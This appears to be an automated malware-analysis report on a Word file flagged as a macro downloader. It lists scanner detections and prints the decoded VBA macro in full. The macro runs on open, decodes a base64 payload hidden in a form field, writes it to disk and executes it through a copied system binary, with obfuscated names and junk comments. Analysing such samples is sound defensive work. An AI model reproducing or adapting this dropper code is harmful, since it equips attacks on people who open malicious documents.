MALICIOUS
190
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim ai8TV As New Shell32.Shell -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
With CreateObject("Microsoft.XMLDOM").createElement("b64") -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7267 bytes |
SHA-256: f263ca4298467105c53196f37ad7089c4c394f764610e5d1d06b0512aa568e1a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "frm"
Attribute VB_Base = "0{D6546787-7200-47A1-8C71-9180381DFED5}{E0EFE643-A124-4FD6-AF76-2FBC010A2BE8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "axmdR"
Sub AutoOpen()
' Intensify fag flat friends
' Whose newer forgetful uzbekistan
' Strips pies lavishly
' Loafer stated
Call aiGml
End Sub
Sub aiGml()
aVI3oy
End Sub
Function a5mtiD(aTcA8)
azwPNu = ""
For a783Mh = Len(aTcA8) To 1 Step -1
azwPNu = azwPNu & "" & Mid(aTcA8, a783Mh, 1)
Next a783Mh
a5mtiD = azwPNu
End Function
Function a8sImz(b64)
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64"
.text = b64
b = .nodeTypedValue
End With
a8sImz = StrConv(b, vbUnicode)
End Function
Attribute VB_Name = "aNYIu"
Sub ax57JP(aK5rL, an6T32)
' Couple sedition re- apprise
' Girth meaningful tour
Set auSLK = CreateObject("Scripting.FileSystemObject")
Call auSLK.CopyFile(aK5rL, an6T32, 1)
' Oman lewd
' Batteries blame shark
' Paucity rob frozen muslims
' Miser counterpoise replace sq wins
End Sub
Sub aZYQ8D(a4B5z, a2iHw4)
' Beacon sip price bangladesh
' Radiation regions eocene
' Pencil diver defraud container
' Emphasize immature observable milfs
' Give closely beacon
' Foreword contraction
' Described
' Reunion ascii hr lecturer tobago
' Dividend consolidate sculpture
' Give cottages
' Loom fifty-five pf cafe
' Clandestine assam communist analyze
' Incorporated plaza
' Esperanto
' Transplant double slug
' Simile sierra announce
' Substratum despicable swiss donna twisted penmanship firefox hop
' Unconvinced abdicate manor
' Sodium pickup conjugal celibate excel
' Lost supplant
' Youthfulness
' Connexions savour viands voters ripe
' Andrew reg
' Crackle northwest scow
' Debasement appraisal
' Bigamy
' Tremendous
' Organic solved
Open a4B5z For Output As #1
Print #1, a2iHw4
' Mo knickerbockers vacuum
' Affordable bookkeeper
Close #1
End Sub
Attribute VB_Name = "a0n1U"
Function a2POb(aX6my)
' Furtive indus believes
' Jovial declension scheduled
' Thrown dilate medicaid smear
' Supernumerary excitation skunk
' Intercede theologian
' Clusters mentor discounted refine
End Function
Function a7zJH(asxyt)
' Ap
' Fleece advertised dimensional proboscis
' Submissive renaissance burly genealogical
' Accommodating cambridge constitutes expiate albumen
' Episodes circumstances suicide
' Musician sot pouch nag
' Comic cumbersome nr
' Kids proposition cognate tasting
' Pan tone salaries
' Upheaval canto
' Textbook parallel stitching salem
' Partial hartford passover notably
' Contains dregs poster dank
' Married lindsay
' Excel
aYRDrj = Split(a5mtiD(frm.paths.text), "|")
Select Case asxyt
Case Is = 0
a7zJH = aYRDrj(0)
Case Is = 1
a7zJH = aYRDrj(1)
Case Is = 2
a7zJH = aYRDrj(2)
Case Is = 3
a7zJH = aYRDrj(3)
End Select
' Realized
' Either decrepitude
' Gentleman arising hindrance beautifully voters
' Sin unrequited julia muffin
' No ilk
' Explain concierge sweet causal heavily
' Brunette symphony martha ethnic
' Jun
' Flickered voyeur wanna theories tribal
' Cute drain harper
' Enlist ingratiate
' Gregarious boc primacy qualify psychologist budget others woodsman
' Accompanies
' Branding rancid stages mercedes seashore declamation book aqueduct
' Extras aesthetics craftsman mixing gary conversely
' Tgp octavo changes acknowledgement marcus
' Hugo extended
' Remain reasonably transference norton
' Improvement cyprus vowel
' Leads charon entertaining
' Lama hasan
End Function
Function ar9sv(aZ8lj, aSTi5)
' Onlooker phonograph
' Depravity fatalism prospective inc.
' Dispute teams exemplary ak rhubarb
' Lung decorative
' Bacchus evacuation ravens stan
' Devices four conditional
' Ibrahim whipping wedge
' Navigating fired operation
End Function
Sub aVI3oy()
ajCvZ1 = a7zJH(0)
aYP80 = a7zJH(1)
ayUBnL = a7zJH(2)
aS45gm = a7zJH(3)
' Swans
' Compatible slug mic second blocking
' Chronic such dogged outlay louise politicians
' Shut justin
' Mustang arizona wells vibrator wane
' Gloucestershire priority
' Dowager
' Grenada lyrics celebrities plaint preoccupation
' Pulsation
' Bearable etruscan negligible
' Remembered mandolin sirup
' Sloop communal eye-witness sims
' Women generated
' Centers beguiling
' Reservoir johannes journalism
' Tapers
' Commands alchemists
' Braced unconcealed
' Cooking
' Vellum clockwork pursuant reform
' Specialty racket syringe peter
' Fleece syracuse ogre neville
' Weeps pneumonia
' Funds
' Craggy pants eliminate wend
' Editorials jocular earn declamation
' Jp edinburgh
' Fifth daily experiment melee psychic
' Accomplishing corse feasible friday
aUNnRS = a5mtiD(a8sImz(frm.pay.text))
' Spoken msn
' Chinese chorus wally xi
aZYQ8D ajCvZ1, aUNnRS
' Guiana notation half-brother spiritualism
' Eel
' Astronomy
' Eyebrow throwing abyssinia abduction
' Bedraggled owned cancellation
' Massy category compute telescope ripen
' Tenable
ax57JP ayUBnL, aYP80
' Insecure detention transformation
' Roster
' Attacked drawings
' Devon carey rambling
' Mongrel instructional
' Scholarships remove yarn cyprus
' Seaweed malign hold
' Th updated eat secede apposite
' Philology islands mash
' Tenets
' Opaque advisability servers lace
' Suck ores loftiness remember markers
' Damages pineapple pill
' Eyelid albania f planetary blowjob v
' Tumor dictatorship immaculate offensive loath
' Dick hatter min contralto
' Coffer smart nondescript
' Yeomanry conflicts
' Primer
' Bastion vane settings
' Confidentiality dissipate purposeless dominica trigger playstation
' Sponsor full saturnine mackerel groundwork alf suit
' Deflected leo orchestra sneak
' Admin
' Transition astute organize defines
' Infringe expect
' Uw cyprus beetle overhung
aUKcA = Chr(34)
aCO1cl = Trim(aS45gm & "t : " & aUKcA & ajCvZ1 & aUKcA)
' Nuclear tourists fact fan insincere
' Phoenician advisability
' Rotunda unsaid talmud undefiled working honest
' Tariff chichester knob mentor
Dim ai8TV As New Shell32.Shell
Call ai8TV.ShellExecute(aYP80, aCO1cl, " ", SW_SHOWNORMAL)
' Yank tide backing
' Lord bath write tickle his fruit
' Dint intro innocuous
' Rubicon racy captor
' Inquisitiveness institutional occasions meets fu terrifying
' Telecommunications inter
' Viewpoint hepatitis solving skein
' Triple rousing methodology
' Ve tgp tannin
' Porpoise suit select market capability normans
' Rimini acceptation of
' Dulcet lancaster
' Eclipse revert perception obituary wilderness
' Erosion plum anatomical bulk
' Marcus tags self-possessed road fisher
' Atlantis analytic
' Stops sen abstaining
' Lewes solutions luther treating
' Examples stimulate
' Races wharves charitable bespoke enrollment
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 39424 bytes |
SHA-256: 0e227300645643173dfbfd6f566f8fad07b060e7b667698afcb602d43e10fd08 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.